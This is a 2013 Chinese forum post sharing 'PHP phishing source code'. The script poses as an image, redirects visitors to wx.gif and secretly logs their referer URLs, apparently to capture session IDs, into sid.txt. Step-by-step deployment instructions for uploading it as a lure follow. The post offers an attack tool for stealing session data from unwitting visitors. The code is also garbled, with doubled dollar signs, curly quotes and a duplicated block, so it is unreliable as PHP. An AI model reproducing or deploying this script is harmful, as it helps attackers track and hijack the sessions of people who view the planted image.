休闲灌水
PHP钓鱼源码分享
schedule发表于 2013-04-01 23:35:00
visibility查看 390
chat_bubble回复 3
#1 楼主
<?
$$$$id=rand(1,1);
$$$$image[1]=‘wx.gif‘;
header(“location:$$$$image[$$$$id]“);
?>
<?php
Header(“Content-type: image/php“);
$$$$url=$$$$_SERVER[‘HTTP_REFERER‘];
$$$$time=date(“Y-m-d H:i:s“);
$$$$file=fopen(“sid.txt“,“a+“);
fwrite($$$$file,str_pad($$$$url,15,“ “,1).“ “.$$$$time.“\n“);
fclose($$$$file);
?>
笔记本输入后改扩展名为php,上传空间,WX.gif为钓鱼图片,钓到的将会以sid.txt形式存在
$$$$id=rand(1,1);
$$$$image[1]=‘wx.gif‘;
header(“location:$$$$image[$$$$id]“);
?>
<?php
Header(“Content-type: image/php“);
$$$$url=$$$$_SERVER[‘HTTP_REFERER‘];
$$$$time=date(“Y-m-d H:i:s“);
$$$$file=fopen(“sid.txt“,“a+“);
fwrite($$$$file,str_pad($$$$url,15,“ “,1).“ “.$$$$time.“\n“);
fclose($$$$file);
?>
笔记本输入后改扩展名为php,上传空间,WX.gif为钓鱼图片,钓到的将会以sid.txt形式存在
全部回复
(3)
登录 后才能回复
flag举报帖子